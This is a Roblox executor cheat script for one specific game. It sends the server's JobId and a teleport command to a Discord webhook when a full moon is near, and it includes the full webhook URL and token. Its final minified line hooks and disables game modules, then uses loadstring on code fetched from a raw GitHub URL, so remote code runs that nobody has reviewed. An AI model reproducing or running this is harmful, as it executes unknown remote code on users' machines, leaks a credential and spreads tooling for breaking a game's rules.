if game.PlaceId == 7449423635 then
    local moonPhases = {
        ["http://www.roblox.com/asset/?id=9709149409"] = 1,
        ["http://www.roblox.com/asset/?id=9709149485"] = 2,
        ["http://www.roblox.com/asset/?id=9709149570"] = 3,
        ["http://www.roblox.com/asset/?id=9709149637"] = 4,
        ["http://www.roblox.com/asset/?id=9709149706"] = 5,
        ["http://www.roblox.com/asset/?id=9709149777"] = 6,
        ["http://www.roblox.com/asset/?id=9709149855"] = 7,
        ["http://www.roblox.com/asset/?id=9709149431"] = 8
    }

    local HttpService = game:GetService("HttpService")
    local Lighting = game:GetService("Lighting")
    local Players = game:GetService("Players")
    local currentTexture = Lighting.Sky.MoonTextureId
    local currentPhase = moonPhases[currentTexture] or 1
    local minutesLeft = math.floor((8 - currentPhase) * 7.5)
    local playerCount = #Players:GetPlayers()

    if minutesLeft < 10 then
        local WebhookurlFM = "https://discord.com/api/webhooks/1369552835720773664/sjCSuiG_m-KhVfRX6EywnxK5Cupft924jbNVaL3VqDnt3IphQF1A4jZBwiPMP1CdSZyQ"

        local Data = {
            ["embeds"]= {
                {
                    ["title"]= "Full Moon Notify",
                    ["color"]= tonumber(0x7269da),
                    ["fields"]= {
                        {
                            ["name"]= "â³ **Status:**",
                            ["value"]= "`"..minutesLeft.." Minute(s)`",
                            ["inline"]= true
                        },
                        {
                            ["name"]= "**[ðŸŒ—] __Moon Phase:__**",
                            ["value"]= "**"..currentPhase.."/8**",
                            ["inline"]= true
                        },
                        {
                            ["name"]= "Players Count",
                            ["value"]= "```"..playerCount.."/12```",
                            ["inline"]= true
                        },
                        {
                            ["name"]= "Job Id",
                            ["value"]= ""..game.JobId.."",
                            ["inline"]= true
                        },
                        {
                            ["name"]= "Script Job Id",
                            ["value"]= 'game:GetService("TeleportService"):TeleportToPlaceInstance('..game.PlaceId..', "'..game.JobId..'", game.Players.LocalPlayer)',
                            ["inline"]= false
                        }
                    }
                }
            }
        }

        local Headers = {["Content-Type"] = "application/json"}
        local Encoded = HttpService:JSONEncode(Data)

        local Request = http_request or request or HttpPost or syn.request
        local Final1 = {Url = WebhookurlFM , Body = Encoded, Method = "POST", Headers = Headers}
        Request(Final1)
    end
end

hookfunction(require(game:GetService("ReplicatedStorage").Effect.Container.Death),function() end);hookfunction(require(game:GetService("ReplicatedStorage").Effect.Container.Respawn),function() end);hookfunction(require(game:GetService("ReplicatedStorage"):WaitForChild("GuideModule")).ChangeDisplayedNPC,function() end);spawn(function() for v0,v1 in pairs(game:GetDescendants()) do if v1:IsA("Texture") then v1.Texture="";elseif (v1:IsA("BasePart") and (v1.Material==Enum.Material.Water)) then v1.Material=Enum.Material.SmoothPlastic;end end for v2,v3 in pairs(game.Players.LocalPlayer.PlayerScripts:GetDescendants()) do local v4={"WaterBlur","WaterEffect","WaterColorCorrection","WaterCFrame","MirageFog"};if table.find(v4,v3.Name) then v3:Destroy();end end end);loadstring(game:HttpGet("https://raw.githubusercontent.com/LuaCrack/Setting/refs/heads/main/Fast.module"))();
